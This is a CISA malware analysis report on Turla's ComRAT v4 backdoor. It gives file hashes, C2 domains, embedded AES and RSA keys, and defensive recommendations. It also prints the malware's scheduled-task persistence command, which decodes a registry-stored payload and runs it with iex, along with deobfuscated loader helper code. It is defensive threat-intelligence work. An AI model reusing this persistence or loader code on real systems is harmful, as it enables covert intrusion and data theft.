MAR-10310246-2.v1 – PowerShell Script: ComRAT | CISA Published: 2020-10-29 · Archived: 2026-04-06 02:03:39 UTC Notification This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise. This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp. Summary Description This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware variant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA, CNMF, and FBI are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques. FBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations. This report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link library (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs used as communication modules. The communication module (32-bit or 64-bit DLL) is injected into the victim systemís default browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The named pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and exfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which includes the configuration and logs files. Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https://us-cert.cisa.gov/ For a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix. Submitted Files (5) 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll) 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1) 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll) 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe) a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1) Domains (6) branter.tk bronerg.tk crusider.tk duke6.tk sanitar.ml wekanda.tk https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 1 of 15 Findings 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 Tags dropper Details Name corrected.ps1 Size 4345430 bytes Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, LF line terminators MD5 65419948186842f8f3ef07cafb71f59a SHA1 93537b0814177e2101663306aa17332b9303e08a SHA256 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 SHA512 83d093c6febacb11fcde57fee98c2385f628e5cd3629bfabd0f9e4d2c5de18c6336b3d3aff8081b06a827e742876d19ae370e81890c247daac73d4 ssdeep 24576:+vq2EYNg0gX792UHDoSe9Ov2a8p+JnHZUoWYWUpcfm3WuPhu/aqJOFKs4Wuw054o:Drr9q0v4ubJmg4OFuwkOM5NZihxs Entropy 4.004402 Antivirus No matches found. YARA Rules No matches found. ssdeep Matches No matches found. Relationships 1349191514... Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 Description This file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into a registry on the victim system. This malicious script also modifies the following scheduled task on the victim's system: —Begin Modified Scheduled Task— C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator —End Modified Scheduled Task— The modification of this scheduled task causes the installed malicious PowerShell script to be executed. Displayed below is the original scheduled task: —Begin Original Scheduled Task—    1.0    D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)    $(@%systemRoot%\system32\wsqmcons.exe,-106)    $(@%systemRoot%\system32\wsqmcons.exe,-108)    $(@%systemRoot%\system32\wsqmcons.exe,-107)    \Microsoft\Windows\Customer Experience Improvement Program\Consolidator         S-1-5-18 https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 2 of 15    false    false    IgnoreNew    true         true     false        true         2004-01-02T00:00:00            PT6H                 %SystemRoot%\System32\wsqmcons.exe     —End Original Scheduled Task— The scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task: —Begin Modified Scheduled Task—    $(@%systemRoot%\system32\wsqmcons.exe,-106)    $(@%systemRoot%\system32\wsqmcons.exe,-108)    1.0    $(@%systemRoot%\system32\wsqmcons.exe,-107)    \Microsoft\Windows\Customer Experience Improvement Program\Consolidator    D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)                PT6H        false         2004-01-02T00:00:00     true             true             LeastPrivilege     SYSTEM        IgnoreNew    false https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 3 of 15 false    true    true    false         true     false        true    true    false    false    false    true    false    PT72H    7         cmd.exe     /c "%SystemRoot%\System32\wsqmcons.exe & PowerShell.exe -v 2 "$GS459ea = 'KVYYOBBA4331110uhyicnoor'; [Text.Encoding]::ASCII.GetString([Convert]::\"Fr`omBa`se6`4Str`ing\"((gp HKLM:\SOFTWARE\Microsoft\SQMClient\Windows).WSqmCons))|iex; ""     —End Modified Scheduled Task—    The modification of the scheduled task illustrated below indicates the primary purpose of this task modification is to decode and execute a PowerShell script contained within the registry key HKLM:\SOFTWARE\Microsoft\SQMClient\Windows = WSqmCons: —Begin Specific Scheduled Task Module—         cmd.exe     /c "%SystemRoot%\System32\wsqmcons.exe & PowerShell.exe -v 2 "$GS459ea = 'KVYYOBBA4331110uhyicnoor'; [Text.Encoding]::ASCII.GetString([Convert]::\"Fr`omBa`se6`4Str`ing\"((gp HKLM:\SOFTWARE\Microsoft\SQMClient\Windows).WSqmCons))|iex; "" —End Specific Scheduled Task Module— This malicious script installs a PowerShell script (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WsqmCons” registry key. The primary purpose of the newly installed PowerShell is to decode and load a malicious DLL, identified as ComRat v4 (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) onto the victim's system. a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 Tags trojan Details Name Decode_PowerShell.ps1 Size 1264496 bytes Type ASCII text, with very long lines, with CRLF, LF line terminators MD5 0fd79f4c60593f6aae69ff22086c3bb0 https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 4 of 15 SHA1 07f0692c856703d75a9946a0fbb3c0db03f7ac40 SHA256 a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 SHA512 28a0ae0a779aa88499f70cf97ef9db9482527017ea76ee2e469e4184684c4d4fb0559e50f1721e7e9d02655bee4cdf7b12c62a3d037ea10130121 ssdeep 24576:jarQlVyeHtWdf7PyJjwLKWp57+7fb0TLaB7VrE:jD567vs1tm Entropy 6.091278 Antivirus Antiy GrayWare/PowerShell.Mimikatz.a ClamAV Win.Trojan.PSempireInj-7013548-0 Microsoft Security Essentials Trojan:PowerShell/Powersploit.J NANOAV Trojan.Script.ExpKit.eydujq Symantec Hacktool.Mimikatz YARA Rules No matches found. ssdeep Matches No matches found. Relationships a3170c32c0... Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 a3170c32c0... Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 Description This heavily encoded PowerShell script is installed by the malicious script “corrected.ps1” (134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an embedded DLL which has been identified as a variant of the malware known as ComRat v4 “ComRATv4.exe (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). Removal of some of the PowerShell obfuscation reveals the functions illustrated below. These functions are used to decompress the embedded DLL, before it is loaded on the target system: —Begin PowerShell Helper Functions—    using System;    using System.IO;    using System.IO.Compression;    public static class CD475bjf{        public static void DBQ800fc(Stream input, Stream output){byte[] buffer = new byte[16 * 1024];        int bytesRead;        while((bytesRead = input.Read(buffer, 0, buffer.Length)) > 0){            output.Write(buffer, 0, bytesRead);        }}}       public static class MAE38aee{           public static byte[] JZ653jdh(byte[] arrayToCompress){            using (MemoryStream outStream = new MemoryStream()){using (GZipStream tinyStream = new GZipStream(outStream, CompressionMode.Compress))using (MemoryStream mStream = new MemoryStream(arrayToCompress))CD475bjf.DBQ800fc(mStream, tinyStream);        return outStream.ToArray();    }}           public static byte[] PGN255ij(byte[] arrayToDecompress){                    using (MemoryStream inStream = new MemoryStream(arrayToDecompress))using (GZipStream bigStream = new GZipStream(inStream, CompressionMode.Decompress))using (MemoryStream bigStreamOut = new MemoryStream()) https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 5 of 15 {CD475bjf.DBQ800fc(bigStream, bigStreamOut);        return bigStreamOut.ToArray();    }}} #decode base64 above $decompress = [Convert]::FromBase64String($decompressbase64); #create another text object for use later $NS70gea = New-Object System.Text.ASCIIEncoding; #convert base64 decoded value to string $decompress = $NS70gea.GetString($decompress,0,$decompress.Length); —End PowerShell Helper Functions— Figure 1 illustrates a part of the payload embedded within this malicious script. The encoded PowerShell script contains an embedded function named “Run”, that can load a DLL directly from memory and inject it into a remote process (Figure 2). The PowerShell script injects the embedded ComRAT DLL (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process. Screenshots Figure 1 - Screenshot of the payload embedded within this malicious script. Figure 2 - Screenshot of the function used to load a DLL directly from memory and inject it into a remote process. 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 Tags trojan Details Name ComRATv4.exe Size 1827840 bytes Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows MD5 faaafa3e115033ba5115ed6a6ba59ba9 SHA1 ca16a95cd38707bad2dc524bb3086b3c0cb3e372 SHA256 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 SHA512 6f2fe02c1e15be2409f89ff1e6ae3c78f87e242ee448fe5ff6d375a74f10c7c6cc01f3f6d796aa34599a891e03c5d421d10f0c041e5a6dc0e346aea3 ssdeep 49152:jTRjrgdOU9p1PZH/JNTFTJT5dwIwzQJH:PRCBNTBwAH Entropy 6.463931 Antivirus Ahnlab Trojan/Win64.Turla ESET a variant of Win64/Turla.BX trojan YARA Rules No matches found. ssdeep Matches No matches found. PE Metadata Compile Date 2018-03-06 09:38:38-05:00 Import Hash d9d661a606c9d1c23b47672d1067de68 https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 6 of 15 PE Sections MD5 Name Raw Size Entropy 11525199e6e248e88e0529cf72a9002d header 1024 2.934959 0f3258519a92690d14406e141dcb285b .text 1027584 6.441800 fa4840dc4653443d4574486df39bc6a3 .rdata 481280 4.896843 ca22c78d526550925d7843a24cd1d266 .data 264704 7.368343 f7cc8fa49cfa87a125d8354082e162f3 .pdata 47104 6.030652 ef6fdd7440f36ba21373b4585a5c83e4 .rsrc 512 4.724729 4f16258cf938a4bc7fe0ae92121f442d .reloc 5632 5.425381 Relationships 44d6d67b53... Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d 44d6d67b53... Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 44d6d67b53... Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 Description This application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into Windows Explorer (Explorer.exe) by a ComRAT PowerShell loader (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim's system day\time and it performs code execution between 9AM to 5PM Monday through Friday. During execution, it installs the following files into the %TEMP% folder: --Begin files-- "%TEMP%\iecache.bin" ==> an AES-256-XTS encrypted VFS FAT16 format, containing the malware configuration and the logs files. (The encryption key is generated during runtime and stored in the Windows registry). "%TEMP%\FSAPIDebugLogFile.txt --End files-- The malware injects an embedded communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or (166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system's default browser and executes it. This file and the communication module communicate with each other using a named pipe. The malware uses the named pipe to send HTTP requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use the Gmail web interface to receive commands and exfiltrate data. Illustrated below are sample data observed in the decrypted VFS in FAT16 format. Some of these files can be updated in the VFS using backdoor commands. --Begin sample data in the VFS -- "/etc/pal/" contains a list of C2 domains: "bronerg.tk|crusider.tk|duke6.tk" "/etc/gal.bin" contains a list of C2 domains: "sanitar.ml|wekanda.tk|branter.tk" "/etc/pki/aes_key.pki" : Contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications: --Begin AES key-- 4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1 --End AES key-- "/etc/pki/public_cert.pki" contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications: --Begin RSA key-- BE51E00093CEB0A5FCAE59EB4EEEB3079D1CB17FC195321587CB513003826917B0BC13EB3B9A4209A4FFAF19C07249D360F447A6FAE3936 --End RSA key-- It uses the public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel. "/etc/mail/subj_dict" contains the the Subject "Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB |NM| n/m |N/M: |*n/m*" "/etc/php_storage/GET/DEF/server.txt " and "/etc/php_storage/POST/DEF/server.txt" contains server IP "172.22.150.125". --End sample data in the VFS -- https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 7 of 15 Screenshots Figure 3 - The first bytes of the decrypted VFS in FAT16 format. Figure 4 - The decrypted VFS hierarchy, containing the malware configuration and the logs files. 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d Tags backdoordownloaderloadertrojan Details Name Communication_module_32.dll Size 61440 bytes Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows MD5 e509c3a40045d2dab9404240f3f201ed SHA1 86f747cac3b16ed2dab6d9f72a347145ff7a850d SHA256 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d SHA512 f78827b6fc258f4a63dd17fec2acb7114329a9d7fd426c72838f2e5e5c54c12fce7be7a0eb9c7e7e74b01fe80c42293ef89c3bcbafd230a68f9639e ssdeep 1536:zlAjaBOUFoD0C8YQ7aZS7C2kkAxWzg39xa3cdjrH++:zl2uOUG0CBQ7aZS7C3uzg39xEM Entropy 5.338807 Antivirus Antiy Trojan[Backdoor]/Win32.Turla Avira TR/Crypt.XPACK.Gen3 ESET a variant of Win32/Turla.EO trojan Ikarus Trojan-Downloader.Win32.Farfli NANOAV Trojan.Win32.Turla.hlrzcr Symantec Heur.AdvML.B YARA Rules No matches found. ssdeep Matches No matches found. PE Metadata Compile Date 2018-03-06 09:36:54-05:00 Import Hash 87ab41c57e95562a3e81f0609398b278 PE Sections MD5 Name Raw Size Entropy b9bd1636e8c11ff1ab2368771e89cfac header 4096 0.612975 077bf2412ba289da7b6261ffec65988d .text 49152 6.051754 1c95870051ff12b740487ff93d19ef3b .rdata 4096 0.317233 b86e403ac8c58a013fe4cda6b6715804 .reloc 4096 0.019202 Relationships https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 8 of 15 00352afc7e... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 00352afc7e... Connected_To branter.tk 00352afc7e... Connected_To wekanda.tk 00352afc7e... Connected_To sanitar.ml 00352afc7e... Connected_To duke6.tk 00352afc7e... Connected_To bronerg.tk 00352afc7e... Connected_To crusider.tk Description This application is a 32-bit Windows DLL that has been identified as the communication module injected into the victim's system default browser by "ComRATv4.exe" (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). It is designed to use the HTTP and a Gmail web interface for the C2. It attempts to connect to its C2 using secure connections. --Begin list of domains-- bronerg.tk crusider.tk duke6.tk sanitar.ml wekanda.tk branter.tk --End list of domains-- Displayed below is sample request header: --Begin header-- CONNECT bronerg[.]tk:443 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3) Host: bronerg.tk:443 Content-Length: 0 Connection: Keep-Alive --End header-- bronerg.tk Tags command-and-control Whois Domain name:     BRONERG.TK Organisation:     Freedom Registry, Inc.     2225 East Bayshore Road #290     Palo Alto CA 94303     United States     Phone: +1 650-681-4172     Fax: +1 650-681-4173 Domain Nameservers:     NS01.FREENOM.COM     NS02.FREENOM.COM     NS03.FREENOM.COM     NS04.FREENOM.COM Relationships bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 9 of 15 bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d Description ComRAT v4 C2 domain. crusider.tk Tags command-and-control Ports 443 TCP Whois Domain name:     CRUSIDER.TK Organisation:     Freedom Registry, Inc.     2225 East Bayshore Road #290     Palo Alto CA 94303     United States     Phone: +1 650-681-4172     Fax: +1 650-681-4173 Domain Nameservers:     NS01.FREENOM.COM     NS02.FREENOM.COM     NS03.FREENOM.COM     NS04.FREENOM.COM Relationships crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d Description ComRAT v4 C2 domain. duke6.tk Tags command-and-control Whois Domain name:     DUKE6.TK Organisation:     Freedom Registry, Inc.     2225 East Bayshore Road #290     Palo Alto CA 94303     United States     Phone: +1 650-681-4172     Fax: +1 650-681-4173 Domain Nameservers:     NS01.FREENOM.COM     NS02.FREENOM.COM https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 10 of 15 NS03.FREENOM.COM     NS04.FREENOM.COM Relationships duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 Description ComRAT v4 C2 domain. sanitar.ml Tags command-and-control Whois Domain name:     SANITAR.ML Organisation:     Freedom Registry, Inc.     2225 East Bayshore Road #290     Palo Alto CA 94303     United States     Phone: +1 650-681-4172     Fax: +1 650-681-4173 Domain Nameservers:     NS01.FREENOM.COM     NS02.FREENOM.COM     NS03.FREENOM.COM     NS04.FREENOM.COM Relationships sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 Description ComRAT v4 C2 domain. wekanda.tk Tags command-and-control Whois Domain name:     WEKANDA.TK Organisation:     Freedom Registry, Inc.     2225 East Bayshore Road #290     Palo Alto CA 94303     United States     Phone: +1 650-681-4172     Fax: +1 650-681-4173 https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 11 of 15 Domain Nameservers:     NS01.FREENOM.COM     NS02.FREENOM.COM     NS03.FREENOM.COM     NS04.FREENOM.COM Relationships wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 Description ComRAT v4 C2 domain. branter.tk Tags command-and-control Ports 443 TCP Whois No Whois record at the time of analysis. Relationships branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 Description ComRAT v4 C2 domain. 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 Tags trojan Details Name Communication_module_64.dll Size 64000 bytes Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows MD5 54902e33dd6d642bc5530de33b19e43c SHA1 a06f0e29fca6eb29bf5334fb3b84a872172b0e28 SHA256 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 SHA512 28b8f63af33f4aebd2b5b582750036db718f657640aca649d4b2b95188661da3834398a56184ee08f64ddf1d32198e722be46dbfbc78e49e0d27 ssdeep 1536:p2JmzHKhyOjQuCLA/9zYgJS7aWSXEuT2XWZdjoEGbgqPU6Izj6N1o6OtAEBiUm5+:p2JmcjQuCLA/VYgJS7H21yXQdj5G0qM Entropy 5.939047 Antivirus ESET a variant of Win64/Turla.CN trojan https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 12 of 15 YARA Rules No matches found. ssdeep Matches No matches found. PE Metadata Compile Date 2018-03-06 09:37:48-05:00 Import Hash 87ab41c57e95562a3e81f0609398b278 PE Sections MD5 Name Raw Size Entropy 199ab75383a70bd1148671ca1c689d0e header 1024 2.031353 46c52ca20a919c2314e32193eac9ec66 .text 60416 5.990363 a97e460909f791b5d0b571099a5b7b56 .rdata 1536 4.519592 c5ba9ad86e832155180da146aef6eabc .pdata 1024 3.061435 Relationships 166b1fb3d3... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 166b1fb3d3... Connected_To bronerg.tk 166b1fb3d3... Connected_To crusider.tk 166b1fb3d3... Connected_To duke6.tk 166b1fb3d3... Connected_To sanitar.ml 166b1fb3d3... Connected_To wekanda.tk 166b1fb3d3... Connected_To branter.tk Description This application is a 64-bit Windows DLL that has been identified as the communication module injected into the victim's system default browser by "ComRATv4.exe" (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). The DLL is similar to the 32-bit communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d). Relationship Summary 1349191514... Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 a3170c32c0... Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 a3170c32c0... Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 44d6d67b53... Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d 44d6d67b53... Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 44d6d67b53... Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 00352afc7e... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 00352afc7e... Connected_To branter.tk 00352afc7e... Connected_To wekanda.tk 00352afc7e... Connected_To sanitar.ml 00352afc7e... Connected_To duke6.tk https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 13 of 15 00352afc7e... Connected_To bronerg.tk 00352afc7e... Connected_To crusider.tk bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 166b1fb3d3... Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 166b1fb3d3... Connected_To bronerg.tk 166b1fb3d3... Connected_To crusider.tk 166b1fb3d3... Connected_To duke6.tk 166b1fb3d3... Connected_To sanitar.ml 166b1fb3d3... Connected_To wekanda.tk 166b1fb3d3... Connected_To branter.tk Recommendations CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts. Maintain up-to-date antivirus signatures and engines. Keep operating system patches up-to-date. Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication. Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required. Enforce a strong password policy and implement regular password changes. Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known. Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests. Disable unnecessary services on agency workstations and servers. Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header). Monitor users' web browsing habits; restrict access to sites with unfavorable content. Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.). Scan all software downloaded from the Internet prior to executing. Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs). Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops". Contact Information Document FAQ https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 14 of 15 What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis. Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-844-Say-CISA or CISA Service Desk . Can I submit malware to CISA? Malware samples can be submitted via three methods: Web: https://malware.us-cert.gov E-Mail: submit@malware.us-cert.gov FTP: ftp.malware.us-cert.gov (anonymous) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov. Source: https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a Page 15 of 15